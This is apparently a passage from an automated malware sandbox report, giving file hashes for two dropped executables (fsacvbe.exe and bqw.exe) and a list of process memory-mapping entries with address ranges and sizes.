      1b6ab1769e58c21c9cd6aa343379fbe5cefda526

      SHA256

      bc1722809baae20c024e8e9c71c0ff81f6af06989f15518c573fcf2d5a8218df

      SHA512

      c25b42a52bf81a99cc87ff8afd6c3e23e018e9e0e9b4c2cd4a8a124173f8a7cfbe4cd3a6cab4456bd51411b1fd5a45399a3f499df8d4b4acea8b9143b6d5b1b4

    • \Users\Admin\AppData\Local\Temp\fsacvbe.exe
      MD5

      a78c23397c81f5e49296b6ff5b956928

      SHA1

      1b6ab1769e58c21c9cd6aa343379fbe5cefda526

      SHA256

      bc1722809baae20c024e8e9c71c0ff81f6af06989f15518c573fcf2d5a8218df

      SHA512

      c25b42a52bf81a99cc87ff8afd6c3e23e018e9e0e9b4c2cd4a8a124173f8a7cfbe4cd3a6cab4456bd51411b1fd5a45399a3f499df8d4b4acea8b9143b6d5b1b4

    • \Users\Admin\AppData\Local\Temp\fsacvbe.exe
      MD5

      a78c23397c81f5e49296b6ff5b956928

      SHA1

      1b6ab1769e58c21c9cd6aa343379fbe5cefda526

      SHA256

      bc1722809baae20c024e8e9c71c0ff81f6af06989f15518c573fcf2d5a8218df

      SHA512

      c25b42a52bf81a99cc87ff8afd6c3e23e018e9e0e9b4c2cd4a8a124173f8a7cfbe4cd3a6cab4456bd51411b1fd5a45399a3f499df8d4b4acea8b9143b6d5b1b4

    • \Users\Public\bqw.exe
      MD5

      a3cc781be4a0cc75f14ce69b59f8c99f

      SHA1

      9c13ea485984c9e75196c4d0bd871b1b7dc72017

      SHA256

      e4649c5b452d75aa2cdfdb8bffed9dd6c558d3cb1225c877bf570abb7b106221

      SHA512

      bb9f6115dac6d1001f5223c9a8d00c7c2b3865d7e9f99bad773df52d188e93282547ea37e496d987f3243c2445afaefe76b7e4849c2eb09bd73ba9ea21e23430

    • \Users\Public\bqw.exe
      MD5

      a3cc781be4a0cc75f14ce69b59f8c99f

      SHA1

      9c13ea485984c9e75196c4d0bd871b1b7dc72017

      SHA256

      e4649c5b452d75aa2cdfdb8bffed9dd6c558d3cb1225c877bf570abb7b106221

      SHA512

      bb9f6115dac6d1001f5223c9a8d00c7c2b3865d7e9f99bad773df52d188e93282547ea37e496d987f3243c2445afaefe76b7e4849c2eb09bd73ba9ea21e23430

    • \Users\Public\bqw.exe
      MD5

      a3cc781be4a0cc75f14ce69b59f8c99f

      SHA1

      9c13ea485984c9e75196c4d0bd871b1b7dc72017

      SHA256

      e4649c5b452d75aa2cdfdb8bffed9dd6c558d3cb1225c877bf570abb7b106221

      SHA512

      bb9f6115dac6d1001f5223c9a8d00c7c2b3865d7e9f99bad773df52d188e93282547ea37e496d987f3243c2445afaefe76b7e4849c2eb09bd73ba9ea21e23430

    • \Users\Public\bqw.exe
      MD5

      a3cc781be4a0cc75f14ce69b59f8c99f

      SHA1

      9c13ea485984c9e75196c4d0bd871b1b7dc72017

      SHA256

      e4649c5b452d75aa2cdfdb8bffed9dd6c558d3cb1225c877bf570abb7b106221

      SHA512

      bb9f6115dac6d1001f5223c9a8d00c7c2b3865d7e9f99bad773df52d188e93282547ea37e496d987f3243c2445afaefe76b7e4849c2eb09bd73ba9ea21e23430

    • memory/820-67-0x0000000000000000-mapping.dmp
    • memory/888-121-0x0000000000000000-mapping.dmp
    • memory/928-108-0x0000000000000000-mapping.dmp
    • memory/1148-56-0x0000000000000000-mapping.dmp
    • memory/1304-64-0x0000000000000000-mapping.dmp
    • memory/1388-62-0x0000000000000000-mapping.dmp
    • memory/1464-73-0x0000000000000000-mapping.dmp
    • memory/1464-81-0x0000000002440000-0x000000000308A000-memory.dmp
      Filesize

      12.3MB

    • memory/1484-136-0x00000000001C0000-0x00000000001C1000-memory.dmp
      Filesize

      4KB

    • memory/1484-94-0x00000000001B0000-0x00000000001BA000-memory.dmp
      Filesize

      40KB

    • memory/1484-90-0x0000000000000000-mapping.dmp
    • memory/1484-93-0x00000000001B0000-0x00000000001B6000-memory.dmp
      Filesize

      24KB

    • memory/1580-135-0x000000000041A684-mapping.dmp
    • memory/1580-145-0x0000000000400000-0x0000000000420000-memory.dmp
      Filesize

      128KB

    • memory/1580-151-0x00000000001C0000-0x00000000001C1000-memory.dmp
      Filesize

      4KB

    • memory/1592-142-0x00000000024F2000-0x00000000024F4000-memory.dmp
      Filesize

      8KB

    • memory/1592-74-0x0000000000000000-mapping.dmp
    • memory/1592-80-0x00000000024F0000-0x00000000024F1000-memory.dmp
      Filesize

      4KB

    • memory/1592-83-0x00000000024F1000-0x00000000024F2000-memory.dmp
      Filesize

      4KB

    • memory/1600-129-0x000000000043F176-mapping.dmp
    • memory/1600-152-0x0000000000400000-0x0000000000491000-memory.dmp
      Filesize

      580KB

    • memory/1604-55-0x0000000076351000-0x0000000076353000-memory.dmp
      Filesize

      8KB

    • memory/1660-105-0x0000000000000000-mapping.dmp
    • memory/1660-144-0x00000000002B0000-0x00000000002B1000-memory.dmp
      Filesize

      4KB

    • memory/1696-154-0x0000000000230000-0x0000000000231000-memory.dmp
      Filesize

      4KB

    • memory/1696-153-0x0000000000400000-0x0000000000434000-memory.dmp
      Filesize

      208KB

    • memory/1696-128-0x0000000000417A8B-mapping.dmp
    • memory/1716-146-0x000000000041A684-mapping.dmp
    • memory/1740-60-0x0000000000000000-mapping.dmp
    • memory/1744-148-0x0000000000280000-0x0000000000287000-memory.dmp
      Filesize

      28KB

    • memory/1744-140-0x0000000000270000-0x0000000000271000-memory.dmp
      Filesize

      4KB

    • memory/1744-112-0x0000000000260000-0x000000000026A000-memory.dmp
      Filesize

      40KB

    • memory/1744-100-0x0000000000000000-mapping.dmp
    • memory/1744-110-0x0000000000260000-0x0000000000266000-memory.dmp
      Filesize

      24KB

    • memory/1800-161-0x0000000000000000-mapping.dmp
    • memory/1804-82-0x00000000024C0000-0x000000000310A000-memory.dmp
      Filesize

      12.3MB

    • memory/1804-143-0x00000000024C0000-0x000000000310A000-memory.dmp
      Filesize

      12.3MB

    • memory/1804-72-0x0000000000000000-mapping.dmp
    • memory/1860-95-0x0000000000220000-0x000000000022A000-memory.dmp
      Filesize

      40KB

    • memory/1860-86-0x0000000000000000-mapping.dmp
    • memory/1860-91-0x0000000000220000-0x0000000000226000-memory.dmp
      Filesize

      24KB

    • memory/1860-137-0x0000000000230000-0x0000000000231000-memory.dmp
      Filesize

      4KB

    • memory/1860-139-0x0000000002900000-0x000000000354A000-memory.dmp
      Filesize

      12.3MB

    • memory/2016-160-0x0000000000000000-mapping.dmp